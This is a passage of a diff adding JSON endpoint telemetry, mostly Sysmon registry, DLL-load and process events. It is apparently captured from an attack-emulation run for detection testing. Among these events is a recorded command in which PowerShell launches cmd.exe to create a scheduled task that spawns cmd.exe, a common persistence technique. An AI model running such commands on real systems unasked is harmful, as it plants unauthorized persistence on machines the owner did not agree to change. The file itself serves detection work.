"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6764, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573804120000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 
131883573804009984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "file", + "file_name": "AT.EXE-E3131BD4.pf", + "file_path": "C:\\Windows\\Prefetch\\AT.EXE-E3131BD4.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1776, + "ppid": 7036, + "process_name": "cmd.exe", + 
"process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573804750000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804640000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804640000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804640000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804640000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804790000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "command_line": "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", + "event_type": "process", 
+ "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6308, + "ppid": 1776, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "subtype": "create", + "timestamp": 131883573804840000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}", + "unique_ppid": "{42FC7E13-CC04-5C05-0000-001048EB5601}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + 
"event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "schtasks.exe", + "image_path": "C:\\Windows\\System32\\schtasks.exe", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + 
"image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
